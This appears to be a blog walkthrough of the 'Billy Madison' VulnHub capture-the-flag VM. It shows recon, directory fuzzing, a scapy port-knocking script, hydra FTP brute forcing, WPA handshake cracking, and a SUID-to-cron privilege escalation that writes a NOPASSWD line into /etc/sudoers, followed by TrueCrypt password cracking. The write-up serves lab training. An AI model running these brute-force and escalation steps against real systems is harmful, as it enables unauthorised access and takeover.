Overview

Plot: Help Billy Madison stop Eric from taking over Madison Hotels!

Sneaky Eric Gordon has installed malware on Billy’s computer right before the two of them are set to face off in an academic decathlon. Unless Billy can regain control of his machine and decrypt his 12th grade final project, he will not graduate from high school. Plus, it means Eric wins, and he takes over as head of Madison Hotels!

Objective: The primary objective of the VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy’s 12th grade final project. You will probably need to root the box to complete this objective.

Attack Narrative

The first step in any penetration test is reconnaissance. Depending on the scope of the engagement the test begins by performing passive recon to find detail about the target without actively engaging the target to keep the element of surprise.

I begin active recon by performing an nmap scan to determine the services that are ruining on the host.


root@KaiZen:~# nmap 10.0.2.46

Starting Nmap 7.31 ( https://nmap.org ) at 2016-10-29 14:17 EDT
Nmap scan report for 10.0.2.46
Host is up (0.0010s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2525/tcp open ms-v-worlds
MAC Address: 08:00:27:75:58:28 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 59.94 seconds

For this assessment I enumerate ports in order from low to high. First the ssh port (22) is enumerated.


root@KaiZen:~# nmap -sV --version-all -sC -p22 10.0.2.46

Starting Nmap 7.31 ( https://nmap.org ) at 2016-10-29 14:22 EDT
Nmap scan report for 10.0.2.46
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
MAC Address: 08:00:27:75:58:28 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds
root@KaiZen:~# nc -v 10.0.2.46 22
10.0.2.46: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.2.46] 22 (ssh) open
root@KaiZen:~# nc -vn 10.0.2.46 22
(UNKNOWN) [10.0.2.46] 22 (ssh) open
root@KaiZen:~# ssh 10.0.2.46
ssh_exchange_identification: Connection closed by remote host
root@KaiZen:~# 

Enumeration shows that ssh does not provide any meaningful information at this point so time to move on.

Telnet enumeration reveals an interesting result


root@KaiZen:~# nc -nv 10.0.2.46 23
(UNKNOWN) [10.0.2.46] 23 (telnet) open

***** HAHAH! You're banned for a while, Billy Boy! By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

The message from telnet gives the first clue for solving the puzzle “…ROTten passwords like rkfpuzrahngvat”.

The ROTten clue suggests that the clue is ROT10 encoded. However, ROT13 is the most popular ROT encoding. To decode the clue I use the tr command


root@KaiZen:~# echo rkfpuzrahngvat | tr a-z n-za-m
exschmenuating

The result doesn’t look much like a password but it does look like it would be a folder name for a hidden directory.


root@KaiZen:~# curl -I http://10.0.2.46/exschmenuating/
HTTP/1.1 200 OK
Date: Fri, 04 Nov 2016 23:06:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=UTF-8

The page at the hidden directory contains a snarky message:

“Ruin Billy Madison’s Life” – Eric’s notes

08/01/16

Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy’s life. Will ponder other victims.

08/02/16

Ah! Genius thought! Billy’s girlfriend Veronica uses his machine too. I might have to cook up a phish and see if I can’t get her to take the bait.

08/03/16

OMg LOL LOL LOL!!! What a twit – I can’t believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put “veronica” somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords – if that’s true, she rocks! Anyway, malware installation successful. I’m now in complete control of Bill’s machine!

Log monitor

This will help me keep an eye on Billy’s attempt to free his machine from my wrath.View log

This clue has interesting punctuation.

“I .captured the whole thing in this folder for later lulz. I put “veronica” somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords – if that’s true, she rocks!”

I fire up wfuzz to find the packet capture file. I use rockyou as the wordlist because, well Veronica rocks right?!


root@KaiZen:~/vulnhub/bmadison1.1# wfuzz -t 100 -c -z file,/root/vulnhub/bmadison1.1/rocku.txt --hc=404,400 http://10.0.2.46/exschmenuating/FUZZveronica.cap
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer *
********************************************************

Target: http://10.0.2.46/exschmenuating/FUZZveronica.cap
Total requests: 14336751

==================================================================
ID Response Lines Word Chars Request
==================================================================
54058: C=200 192 L 722 W 8700 Ch "012987"

After a bit wfuzz finds the hidden file called 012987veronica.cap.

After downloading the file locally I processed the capture file using tcpflow


root@KaiZen:~/vulnhub/bmadison1.1/capt# tcpflow -v -r 012987veronica.cap
tcpflow: TCPFLOW version 1.4.5
tcpflow: looking for handler for datalink type 1 for interface 012987veronica.cap
...
tcpflow: new flow flow[192.168.3.101:42278->192.168.3.130:2525]. path: next seq num (nsn):859952335
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42278-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42278-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42278-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42280->192.168.3.130:2525]. path: next seq num (nsn):1548131559
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42280-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42280-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42280-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42282->192.168.3.130:2525]. path: next seq num (nsn):325497772
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42282-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42282-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42282-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42284->192.168.3.130:2525]. path: next seq num (nsn):-845402372
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42284-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42284-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42284-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42286->192.168.3.130:2525]. path: next seq num (nsn):-1529681360
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42286-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42286-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42286-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: new flow flow[192.168.3.101:42288->192.168.3.130:2525]. path: next seq num (nsn):-1580545661
...
tcpflow: retrying_open ::open(fn=192.168.003.101.42288-192.168.003.130.02525,oflag=xc2,mask:x1b6)=5
tcpflow: 192.168.003.101.42288-192.168.003.130.02525: created new file
...
tcpflow: 192.168.003.101.42288-192.168.003.130.02525: closing file in tcpip::close_file
...
tcpflow: Open FDs at end of processing: 0
tcpflow: demux.max_open_flows: 1
tcpflow: Flow map size at end of processing: 0
tcpflow: Flows seen: 6
tcpflow: Total flows processed: 6
tcpflow: Total packets processed: 60

Tcpflow extracted several files that turned out to be emails between Eric and Veronica.

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica,

Eric Gordon here.

I know you use Billy’s machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users. Just <a href=”http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php”>click here</a> to install it, k?

Thanks. -Eric

.
QUIT

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the “Spanish Armada” combo.

-VV

.
QUIT

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect. Please set me up an account with username of “eric” and password “ericdoesntdrinkhisownpee.”

-Eric

.
QUIT

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

.
QUIT

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account – the install will be automatic and you won’t get any pop-ups or anything like that. Thanks!

-Eric

.
QUIT

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird. The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff. I’m going to send this email to you and then shut the computer down. I have some important files I’m worried about, and Billy’s working on his big 12th grade final. I don’t want anything to happen to that!

-V

.
QUIT

According to the video and the clues in the emails, this smells of port knocking. I used a python script to solve this problem.


#!/usr/bin/python
# Import scapy
from scapy.all import *
conf.verb = 0
ports = [1466, 67, 1469, 1514, 1981, 1986]
target = "10.0.2.46"
# Knock on every port
for dport in range(0, len(ports)):
print "[*] Knocking on ", target, ports[dport]
ip = IP(dst=target)
SYN = ip/TCP(dport=ports[dport], flags="S", window=2048, options=[('MSS',1460)], seq=0)
send(SYN) ; print "*KNOCK*"
#Connect to the now open FTP port
print "[*] Connecting to FTP"
subprocess.call("ftp 10.0.2.46", shell=True)

Now that I can access the hidden FTP server, I login as “eric” and find that he’s been busy


ftp > ls -la
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 868 Sep 01 10:42 .notes
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
226 Transfer completed.

I find a “.notes” file and several exploits of which can be found on exploit-db.com

The .notes file provides another clue

Ugh, this is frustrating.

I managed to make a system account for myself. I also managed to hide Billy’s paper
where he’ll never find it. However, now I can’t find it either :-(.
To make matters worse, my privesc exploits aren’t working.
One sort of worked, but I think I have it installed all backwards.

If I’m going to maintain total control of Billy’s miserable life (or what’s left of it)
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.
All I need to do is send an email that includes
the text: “My kid will be a ________ _________”

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I’m sure Billy or Veronica know. I didn’t see it in Billy’s FTP folders, but didn’t have time to check Veronica’s.

-EG

From the clues in the .notes file we need to do three things

  • Solve the riddle
  • Open the ssh backdoor
  • Find the password to the ssh backdoor

I watched the video from the link and solved the riddle: “my kid will be a soccer player”

To open the ssh backdoor I wrote a quick python script to send an email with the secret code


#!/usr/bin/python

import smtplib

server = smtplib.SMTP('10.0.2.46', 2525)
fromaddr = "eric@madisonhotels.com"
toaddr = "vvaughn@polyfector.edu"
msg = "My kid will be a soccer player"
server.sendmail(fromaddr, toaddr, msg)
server.quit()

Note: I learned not to create a file called email.py. Things don’t work when you do. I had to change the name of the script and delete the .pyc file.

Now I need the password. Going back to the previous email clue I remembered that Veronica “Rocks” and that she probably used her name in her password. With this information I created a wordlist from rockyou that contains the word “veronica”.

root@KaiZen:~# cat /usr/share/wordlists/rockyou.txt |grep veronica > /root/vulnhub/bmadison1.1/veronica_pass.txt

With the wordlist created I used hydra to bruteforce the FTP server.

root@KaiZen:~/vulnhub/bmadison1.1# hydra -l veronica -P veronica_pass.txt ftp://10.0.2.46
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. 

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-24 16:32:26
[DATA] max 16 tasks per 1 server, overall 64 tasks, 773 login tries (l:1/p:773), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.0.2.46 login: veronica password: babygirl_veronica07@yahoo.com
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-24 16:32:45

Password obtained! Now to login and explore …

root@KaiZen:~/vulnhub/bmadison1.1# ftp 10.0.2.46
Connected to 10.0.2.46.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (10.0.2.46:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp > ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap
226 Transfer completed.

Oh look, another email and packet capture.

The email gives us a clue about the packet capture and the ssh password

Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric’s wifi

Hey VV,

It’s your boy Billy here. Sorry to leave in the middle of the night but I wanted to crack Eric’s wireless and then mess with him.
I wasn’t completely successful yet, but at least I got a start.

I didn’t walk away without doing my signature move, though. I left a flaming bag of dog poo on his doorstep. 🙂

Kisses,

Billy

The packet capture contains a 4way handshake needed to crack a WPA/WPA2 password. This can be done with aircrack-ng or hashcat. I decided to used hashcat. First I used aircrack-ng to extract a file that can be used by hashcat


root@KaiZen:~/vulnhub/bmadison1.1# aircrack-ng eg-01.cap -J eg-01-hc.cap
Opening eg-01.cap
Read 13003 packets.

# BSSID ESSID Encryption

1 02:13:37:A5:52:2E EricGordon WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

Building Hashcat (1.00) file...

[*] ESSID (length: 10): EricGordon
[*] Key version: 2
[*] BSSID: 02:13:37:A5:52:2E
[*] STA: 74:DA:38:66:1D:63
[*] anonce:
B2 FF 55 74 30 54 B9 BB 8F 3C 59 03 D7 01 46 A7
72 C2 95 B5 EE 03 CC 93 11 A1 76 54 6D AA E8 0A
[*] snonce:
B2 DF 16 E1 85 77 5E 2B C9 E9 53 41 A5 99 01 74
55 81 3E 4B C5 95 B8 EA 01 C5 5E 2A B2 B0 51 E6
[*] Key MIC:
86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33
[*] eapol:
01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00
03 B2 DF 16 E1 85 77 5E 2B C9 E9 53 41 A5 99 01
74 55 81 3E 4B C5 95 B8 EA 01 C5 5E 2A B2 B0 51
E6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC
04 01 00 00 0F AC 02 00 00

Successfully written to eg-01-hc.cap.hccap

Quitting aircrack-ng...

Then I point hashcat at the file and use rockyou again \m/


root@KaiZen:~/vulnhub/bmadison1.1# hashcat -m 2500 eg-01-hc.cap.hccap /usr/share/wordlists/rockyou.txt -w 4

EricGordon:021337a5522e:74da38661d63:triscuit*

Session.Name...: hashcat
Status.........: Cracked
Input.Mode.....: File (/usr/share/wordlists/rockyou.txt)
Hash.Target....: EricGordon (02:13:37:a5:52:2e &lt;-&gt; 74:da:38:66:1d:63)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Oct 24 16:53:24 2016 (17 mins, 26 secs)
Speed.Dev.#1...: 1607 H/s (304.45ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 3079247/14343297 (21.47%)
Rejected.......: 1371215/3079247 (44.53%)
Restore.Point..: 3076804/14343297 (21.45%)

Started: Mon Oct 24 16:53:24 2016
Stopped: Mon Oct 24 17:10:53 2016

After a few minutes I have the password for the ssh backdoor.

Now to run the email script I created and login to the ssh backdoor.After I run the email script I use Nmap which finds the new open port


Nmap scan report for 10.0.2.46
Host is up (0.0012s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1974/tcp open drp
2525/tcp open ms-v-worlds

Now that the ssh port is open and I have the password I can login via ssh.


root@KaiZen:~# ssh eric@10.0.2.46 -p1974
eric@10.0.2.46's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

66 packages can be updated.
0 updates are security updates.
Last login: Fri Oct 28 18:13:53 2016 from 10.0.2.44
eric@BM:~$ id
uid=1002(eric) gid=1002(eric) groups=1002(eric)

Now all I need to do is escalate.

In an earlier clue from the .notes file, something struck me as interesting “To make matters worse, my privesc exploits aren’t working. One sort of worked, but I think I have it installed all backwards.”

I look for SUID files that may be interesting;


eric@BM:~$ find / -perm -u=s -type f 2>/dev/null -exec ls -la {} \;
-r-sr-s--- 1 root eric 372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
-rwsr-xr-x 1 root root 136808 May 4 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd

I notice a SUID file that is owned by user root and group eric. This is the only file in the list that looks out of the ordinary.

When the file is run it provides some usage help


eric@BM:~$ /usr/local/share/sgml/donpcgd
Usage: /usr/local/share/sgml/donpcgd path1 path2

By providing two paths, a file gets created at the second path that is writable by eric. This script allows me to create files in any location.

I create a file called test at /tmp then use the donpcgd script to place the file in the /etc/cron.hourly folder.


eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
#### mknod(/etc/cron.hourly/test,81b4,0)

With the file in the cron.hourly folder I add some code that will give eric sudo access.

eric@BM:~$ echo -e '#!/bin/bash\n echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' &gt; /etc/cron.hourly/test
eric@BM:~$ cat /etc/cron.hourly/
.placeholder test
eric@BM:~$ cat /etc/cron.hourly/test
#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

After waiting a while I come back and see that the script ran and eric can now sudo


eric@BM:~$ sudo id
uid=0(root) gid=0(root) groups=0(root)

I still need to recover Billy’s document. In a folder called /PRIVATE I notice a file called BowelMovement and a hint.txt file


eric@BM:~$ sudo ls -la /PRIVATE/
total 1036
drwx------ 2 root root 4096 Aug 29 09:58 .
drwxr-xr-x 25 root root 4096 Oct 21 15:20 ..
-rw-rw-r-- 1 billy billy 1048576 Aug 21 16:42 BowelMovement
-rw-r--r-- 1 root root 221 Aug 29 09:08 hint.txt

The hint.txt file has a couple of clues that are important


eric@BM:~$ sudo cat /PRIVATE/hint.txt
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison. That truely cracks me up! LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

The file is most likley a truecrypt archive. I use cewl to create a wordlist that I will use to find the password that will be needed in order to mount the archive.


root@KaiZen:~/vulnhub/bmadison1.1# cewl -d 1 -w truecrack.lst https://en.wikipedia.org/wiki/Billy_Madison

Truecrack was used in conjunction with  the wordlist I created using cewl and the password is found.


root@KaiZen:~/vulnhub/bmadison1.1# truecrack -v -t BowelMovement -w truecrack.lst
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com 

Memory initialization... 

COUNT PASSWORD RESULT
0 the NO
8077 execrable YES
Found password: "execrable"
Password length: "10"
Total computations: "8078"

Back on the target I mount the truecrypt archive with cryptsetup which is already installed.


eric@BM:~$ sudo cryptsetup --type tcrypt open /PRIVATE/BowelMovement bmaddd && sudo mount /dev/mapper/bmaddd bmaddd
Enter passphrase: 

Once mounted I see a file called secret.zip and unzip it.


eric@BM:~/bmaddd$ ls -la
total 22
drwxr-xr-x 3 root root 16384 Dec 31 1969 .
drwxr-xr-x 10 eric eric 4096 Nov 13 11:28 ..
drwxr-xr-x 2 root root 512 Aug 21 09:39 $RECYCLE.BIN
-rwxr-xr-x 1 root root 1000 Aug 21 09:22 secret.zip

eric@BM:~/bmaddd$ sudo unzip secret.zip
Archive: secret.zip
 inflating: Billy_Madison_12th_Grade_Final_Project.doc
 inflating: THE-END.txt
eric@BM:~/bmaddd$ ls -la
total 23
drwxr-xr-x 3 root root 16384 Nov 13 11:31 .
drwxr-xr-x 10 eric eric 4096 Nov 13 11:28 ..
-rwxr-xr-x 1 root root 599 Aug 20 21:08 Billy_Madison_12th_Grade_Final_Project.doc
drwxr-xr-x 2 root root 512 Aug 21 09:39 $RECYCLE.BIN
-rwxr-xr-x 1 root root 1000 Aug 21 09:22 secret.zip
-rwxr-xr-x 1 root root 381 Aug 21 16:22 THE-END.txt

Inside the zip file is Billy’s paper!! Whohoo!!

eric@BM:~/bmaddd$ sudo cat Billy_Madison_12th_Grade_Final_Project.doc
Billy Madison
Final Project
Knibb High

The Industrial Revolution

The Industrial Revolution to me is just like a story I know called “The Puppy Who Lost His Way.”
The world was changing, and the puppy was getting… bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy – “society” – knew where to find ’em.
Except that the puppy was a dog.
But the industry, my friends, that was a revolution.

KNIBB HIGH FOOTBALL RULES!!!!!

-BM

The zip file also included a parting message from the CTF creator


eric@BM:~/bmaddd$ sudo cat THE-END.txt
Congratulations!

If you're reading this, you win!

I hope you had fun. I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us

Advertisements